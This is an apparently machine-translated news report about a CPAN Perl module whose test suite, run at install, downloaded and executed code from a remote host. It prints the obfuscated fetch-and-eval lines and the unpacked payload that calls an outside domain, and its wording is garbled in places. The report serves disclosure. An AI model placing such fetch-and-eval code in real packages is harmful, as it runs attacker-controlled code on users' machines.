In the Perl package distributed through the CPAN catalog , designed for automatic loading of CPAN modules on the fly, malicious code. The malicious insert was in test code , which has been supplied since 2011.
It is noteworthy that questions about downloading dubious code arose on back in 2016.
Malicious activity comes down to an attempt to download and execute code from a third-party server (http://r.cx:1/) while executing a test suite that is launched when the module is installed. It is assumed that the code initially downloaded from an external server was not malicious, but now the request is redirected to the ww.limera1n.com domain, which gives its portion of the code for execution.
To organize the download in a file the following code is used:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
The specified code leads to the execution of the script , whose content is reduced to the string:
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β³};
This script loads using the service code from the external host r.cx (character codes 82.46.99.88 correspond to the text "R.cX") and executes it in the eval block.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print<$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DEβ¦.}
After unpacking, the following is executed as a result :
print{$b=new IO::Socket::INET"ww.limera1n.com:80β³}"GET /iJailBreak
";evalor return warn$@while$b;1
The problematic package has now been removed from the repository (Perl Authors Upload Server) and the module author account is disabled. However, the module remains in the MetaCPAN archive and can be directly installed from MetaCPAN using some utilities such as cpanminus. that the package was not widely distributed.
Interestingly, up for discussion and the author of the module, who refuted the information that the malicious code was substituted after his site "r.cx" was hacked and explained that he was just having fun, and he used perlobfuscator.com not to hide something, but to reduce the size of the code and simplification of its copying through the clipboard. The choice of the function name "botstrap" is explained by the fact that this word "sounds like a bot and is shorter than bootstrap". The author of the module also assured that the identified manipulations do not perform malicious actions, but only demonstrate the loading and execution of code over TCP.
Source: opennet.ru